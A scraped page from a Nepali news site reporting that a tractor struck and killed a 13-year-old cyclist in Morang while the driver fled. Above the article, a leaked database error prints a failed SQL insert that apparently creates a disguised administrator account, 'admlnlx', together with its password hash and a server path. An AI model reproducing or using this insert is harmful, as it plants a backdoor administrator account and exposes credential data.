WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6sVhsO0EEFUCUWEL4NEOsl90frVe90', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 23:06:05', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
ट्याक्टरको ठक्करबाट किशोरीको घटनास्थलमै मृत्यु – Gaule Khabar

ट्याक्टरको ठक्करबाट किशोरीको घटनास्थलमै मृत्यु

ट्याक्टरको ठक्करबाट किशोरीको घटनास्थलमै मृत्यु

मोरङ(उर्लाबारी ) मंसिर २४ –

मोरङको कदमाहा– २ स्थित विराटनगर– रङ्गेली सडकखण्डमा आज बिहान ट्याक्टरको ठक्करबाट एक किशोरीको घटनास्थलमै मृत्यु भएको छ ।

बिहान रङ्गेलीबाट विराटनगर जाँदै गरेको को २ त १३७४ नम्बरको ट्याक्टरले ठक्कर दिँदा साइकलयात्री मोरङ कटहरी– ९ बस्ने १३ वर्षीया किशोरी मनिषा सहनीको मृत्यु भएको जिल्ला ट्राफिक प्रहरी कार्यालयका प्रमुख प्रहरी निरीक्षक धनप्रसाद सिवाकोटीले जानकारी दिनुभयो ।

ठक्कर दिने ट्याक्टरलाई नियन्त्रणमा लिए पनि चालक फरार रहेकाले खोजी भइरहेको प्रहरीले जनाएको छ । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका